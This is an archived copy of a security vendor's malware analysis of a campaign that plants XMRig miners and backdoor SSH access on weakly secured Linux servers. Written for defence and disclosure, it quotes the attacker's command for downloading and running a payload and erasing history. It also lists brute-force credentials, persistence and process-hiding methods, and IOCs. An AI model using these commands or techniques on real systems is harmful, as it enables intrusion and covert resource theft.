{ "id": "6e0d8ab7-3242-4c51-9d6f-3d35ca558edb", "created_at": "2026-04-06T00:09:55.506264Z", "updated_at": "2026-04-10T03:34:59.839779Z", "deleted_at": null, "sha1_hash": "86dcb88e8ad174d9169c965836b00c32697ebb17", "title": "CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2723570, "plain_text": "CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers\r\nBy ATCP\r\nPublished: 2023-04-23 · Archived: 2026-04-05 20:30:22 UTC\r\nAhnLab Security Emergency response Center (ASEC) has recently discovered XMRig CoinMiner being installed on poorly\r\nmanaged Linux SSH servers. The attacks have been happening with a distinct pattern since 2022: they involve the usage of\r\nmalware developed with Shell Script Compiler (SHC) when installing the XMRig, as well as the creation of a backdoor SSH\r\naccount.\r\nWhen looking at the attack cases against poorly managed Linux SSH servers, most of them involve the installation of DDoS\r\nBot or CoinMiner. DDoS Bot has been covered here in the ASEC Blog before through the attack cases where ShellBot [1]\r\nand ChinaZ DDoS Bot [2] were installed respectively. The installation of XMRig CoinMiner was covered in tandem with\r\nthe SHC malware [3].\r\nThis blog post will cover one of the various attack cases where CoinMiner is installed. The main features of this attack\r\ncampaign include its relatively recent start, use of SHC, and the inclusion of a personalized message that says “KONO DIO\r\nDA” from the threat actor.\r\n1. Dictionary Attack Against Linux SSH Servers\r\nPoorly managed services are one of the prime examples of attack vectors used to target server environments such as Linux\r\nservers. The Secure Shell (SSH) service is installed in most Linux server environments, can easily be used for attacks, and is\r\nprone to poor management. SSH allows administrators to log in remotely and control the system, but they must log into the\r\nuser account registered to the system to do so.\r\nIf simple account credentials (ID/PW) are used in a Linux system, a threat actor can log into the system through brute force\r\nor a dictionary attack, allowing them to execute malicious commands. When Linux SSH servers that are poorly managed are\r\nattacked, the main attack method involves searching externally exposed SSH servers through port scanning and using the\r\nknown account credentials to perform dictionary attacks and log in. Malware is then downloaded afterward.\r\nThe following is a list of IDs/PWs used in those attacks.\r\nID PW Attacker\r\nroot . 23.224.232[.]68\r\nroot … 23.224.232[.]68\r\nroot P@ssw0rd 23.224.232[.]68\r\nadmin password1! 23.224.232[.]68\r\nweb 123456 23.224.232[.]68\r\ntomcat tomcat 23.224.232[.]68\r\ncentos Huawei@123 23.224.232[.]68\r\noracle Huawei@123 23.224.232[.]68\r\nTable 1. Attack sources and account credentials used for the “KONO DIO DA” attacks\r\n2. Cases of KONO DIO DA Attacks – Latest\r\nhttps://asec.ahnlab.com/en/51908/\r\nPage 1 of 7\n\nThe threat actor used the commands below to download and execute malware after successfully logging in. “uname -a” and\r\n“nproc” are commands that output the system information. It is assumed that these are used so that the threat actor can check\r\nwhich systems have a CoinMiner installed on them later on. There are also commands that delete the history of these\r\ncommands after the malware has been executed.\r\n# uname -a;nproc; wget -q 46.41.150[.]129/.bo/am ; chmod +x am ; ./am ; history -c ; rm -rf ~/.bash_history\r\nThe downloaded “am” file is malware that has been developed with SHC, and functions as a downloader. The fact that it\r\nwas developed with SHC means that the original malware is actually a Bash script that has been converted into the ELF\r\nformat. Details regarding SHC have been covered previously in the blog post below.\r\n“am” is a simple downloader that downloads and executes “nw”, while “nw” is also a downloader that ultimately downloads\r\nand executes additional malware. The “nw” Bash script forcefully terminates and deletes the CoinMiner it used in the past\r\nalong with its other malware before downloading and executing a compressed file with the XMRig and Bash script malware.\r\nThe compressed file includes the XMRig “dbus-daemon –system –address=systemd_ –nofork –nopidfile –systemd-activation –syslog-only”, the configuration file “config.json”, and 3 Bash script malware.\r\nhttps://asec.ahnlab.com/en/51908/\r\nPage 2 of 7\n\n“nw” executes the “start” Bash script inside the compressed file, and “start” is responsible for the function that executes the\r\n“admin” Bash script. “admin” is responsible for registering the cron task, which executes the “root.sh” Bash script and\r\n“root.sh” every minute.\r\n“root.sh” executes XMRig “dbus-daemon –system –address=systemd_ –nofork –nopidfile –systemd-activation –syslog-only” that exists in the same path, before reading and using the configuration information required for mining from\r\n“config.json” which also exists in the same path. XMRig is executed under the disguised name of a normal process, “dbus-daemon”. Not only does it use its process name, but the arguments used upon execution are also mimicked, making it\r\ndifficult for ordinary users to notice that a CoinMiner is currently running.\r\nMining Pool Wallet\r\nxmr.doi-2020[.]net:14444 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV\r\nval.doi-2020[.]net:80 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mB\r\n142.202.242[.]45:80 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mB\r\npool.hashvault[.]pro:80 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mB\r\nAS.doi-2020[.]net:80 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV\r\n139.99.123[.]196:80 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV\r\npool.supportxmr[.]com:80 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mB\r\nTable 2. Threat actor’s XMRig mining information\r\n3. Cases of KONO DIA DA Attacks – Past\r\nLooking at past cases, it is apparent that the malware used in recent attacks has fewer features than before. The initially\r\ninstalled file cannot be confirmed, but “hoze” is a Bash script that performs the same functions as “nw”. “hoze”\r\ndecompresses the downloaded compressed file and executes an ELF file named “init0”. “init0” is a malware strain that\r\nprovides various additional features such as installing the XMRig CoinMiner.\r\nUnlike the recently confirmed attacks, the “KONO DIO DA” threat actor used a wider variety of features during their past\r\nattacks. The feature to maintain persistence was one of the main features they used. A “key” file existed in the compressed\r\nhttps://asec.ahnlab.com/en/51908/\r\nPage 3 of 7\n\nfile.\r\nThe following public SSH key was included in the “key” file. “init0” removes the existing “~/.ssh/authorized_keys” file and\r\ncopies the “key” file that was inside the compressed file to that directory.\r\nssh-rsa\r\nAAAAB3NzaC1yc2EAAAADAQABAAABAQCh047MLLA8ul64R+zVcEezUGtPUhnB+6mSzXoikFgju2orDUBX4K1ve/SW2pMQeQf9ErQoj\r\nrsa-key\r\nWhen logging into a remote SSH server, it is possible to log in without an ID and PW by generating public and private keys.\r\nTo accomplish this, a user can generate public and private SSH keys and then register their public key to their desired server.\r\nAfterward, the private key can be used to log into the client. In this case, the threat actor creates and registers their public\r\nkey, which is the “key” file, to the “~/.ssh/authorized_keys” path. This allows them to use their private key later to log into\r\nthe infected system.\r\nBesides this, the threat actor can use the usermod command to add an account called “cheeki”. If the infected system has an\r\naccount called “root”, “dolphinscheduler”, “admin”, “es”, or “hadoop”, then the password is changed by the threat actor.\r\nThis process is a persistence maintenance technique that creates a backdoor account on an infected system, allowing the\r\nthreat actor to log in at a later date.\r\nThe “uninstall.sh” Bash script is responsible for removing the Ali cloud shield (Ann Knight) of the security service Alibaba\r\nCloud. kinsing is a malware strain that is primarily used to remove Aegis. kinsing installs a Bash script that is capable of\r\nremoving not only Aegis, but Tencent QCloud Monitor as well. It is also capable of disabling SELinux and AppArmor.\r\nhttps://asec.ahnlab.com/en/51908/\r\nPage 4 of 7\n\nContrary to its name, “init.sh” is an SHC ELF file, and its simple structure is shown below. It is responsible for executing\r\nthe CoinMiner and hiding the process. To do this, it creates the “/var/tmp/…” directory and uses the mount command to bind\r\nthe directory to the /proc file system on the PID of the miner process. This is one of the previously known methods used to\r\nconceal processes. The threat actor uses this simple command instead of a rootkit to conceal the CoinMiner’s process.\r\nThe aforementioned scripts and SHC ELF files perform supplementary roles, while “secure” is responsible for the main\r\nfeatures. “secure” is an ELF file built with SHC, and is responsible for executing XMRig CoinMiner, installing the latest\r\nXMRig, and registering itself in the cron task. Therefore, as it is executed regularly through the cron task, if XMRig does\r\nnot exist on the system, the latest version is downloaded to start mining for cryptocurrency on the infected system.\r\nWhen looking at the attack cases against poorly managed Linux SSH servers, most of them involve the installation of DDoS\r\nBot or CoinMiner. Most CoinMiner attack cases have no notable characteristics, as XMRig is simply installed to mine\r\nhttps://asec.ahnlab.com/en/51908/\r\nPage 5 of 7\n\nMonero Coins. However, the “KONO DIO DA” threat actors use additional malware and various analysis disruption\r\ntechniques in addition to installing XMRig, and these attacks were confirmed relatively recently.\r\nMining Pool Wallet\r\n5.9.157[.]2:10380 TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9Y\r\n2.58.149[.]237:2007 TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9Y\r\nTable 3. Threat actor’s XMRig mining information – Past\r\n4. Conclusion\r\nAttack campaigns where a CoinMiner is installed on poorly managed Linux SSH servers have been occurring persistently\r\nsince the past. The “KONO DIO DA” attack campaign covered here maintains its persistence by registering a backdoor SSH\r\naccount in addition to installing the XMRig CoinMiner. If CoinMiner is installed, system resources are used to mine Monero\r\nCoins for the threat attack, and the threat actor can later log in through the backdoor SSH account to either install additional\r\nmalware, steal information from the system, or perform various other malicious behaviors.\r\nBecause of this, administrators should use passwords that are difficult to guess for their accounts and change them\r\nperiodically to protect the Linux server from brute force attacks and dictionary attacks, and update to the latest patch to\r\nprevent vulnerability attacks. They should also use security programs such as firewalls for servers accessible from outside to\r\nrestrict access by attackers. Finally, caution must be practiced by updating V3 to the latest version to block malware\r\ninfection in advance.\r\nFile Detection\r\n– CoinMiner/Text.Config (2023.04.24.02)\r\n– Downloader/Linux.Agent.1011056 (2023.04.24.02)\r\n– Downloader/Linux.Agent.11344 (2023.04.24.02)\r\n– Downloader/Shell.Agent.SC187868 (2023.04.24.02)\r\n– Downloader/Shell.Agent.SC187872 (2023.04.24.02)\r\n– Linux/CoinMiner.Gen2 (2019.07.31.08)\r\n– Trojan/Linux.Agent.1010416 (2023.04.24.02)\r\n– Trojan/Linux.Hider.1008280 (2023.04.24.02)\r\n– Trojan/Shell.Agent.SC187867 (2023.04.24.02)\r\n– Trojan/Shell.Agent.SC187876 (2023.04.24.02)\r\n– Trojan/Shell.Runner.SC187869 (2023.04.24.02)\r\n– Trojan/Shell.Runner.SC187871 (2023.04.24.02)\r\nMD5\r\n1192697ed3d2302bec3ee828c154e300\r\n1932d2e4081f6dd5c8b32d29b1ab5caf\r\n1db93cb95e409769561efb66e4fd5c72\r\n20ac8a45d129e3ce3444494d9672692c\r\n254784ca05bdd3928d7889d0ea3195ab\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//141[.]95[.]19[.]91[:]8080/xri/config[.]json\r\nhttp[:]//141[.]95[.]19[.]91[:]8080/xri/xri\r\nhttp[:]//2[.]58[.]149[.]237[:]6972/hoze\r\nhttp[:]//2[.]58[.]149[.]237[:]6972/xri2[.]tar\r\nhttp[:]//46[.]41[.]150[.]129/[.]bo/am\r\nAdditional IOCs are available on AhnLab TIP.\r\nFQDN\r\ninit[.]sh\r\nroot[.]sh\r\nhttps://asec.ahnlab.com/en/51908/\r\nPage 6 of 7\n\nuninstall[.]sh\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner\r\nbelow.\r\nSource: https://asec.ahnlab.com/en/51908/\r\nhttps://asec.ahnlab.com/en/51908/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://asec.ahnlab.com/en/51908/" ], "report_names": [ "51908" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31", "created_at": "2023-01-06T13:46:38.376868Z", "updated_at": "2026-04-10T02:00:02.949077Z", "deleted_at": null, "main_name": "Cleaver", "aliases": [ "G0003", "Operation Cleaver", "Op Cleaver", "Tarh Andishan", "Alibaba", "TG-2889", "Cobalt Gypsy" ], "source_name": "MISPGALAXY:Cleaver", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3", "created_at": "2023-01-06T13:46:39.390649Z", "updated_at": "2026-04-10T02:00:03.311299Z", "deleted_at": null, "main_name": "Kinsing", "aliases": [ "Money Libra" ], "source_name": "MISPGALAXY:Kinsing", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434195, "ts_updated_at": 1775792099, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/86dcb88e8ad174d9169c965836b00c32697ebb17.pdf", "text": "https://archive.orkl.eu/86dcb88e8ad174d9169c965836b00c32697ebb17.txt", "img": "https://archive.orkl.eu/86dcb88e8ad174d9169c965836b00c32697ebb17.jpg" } }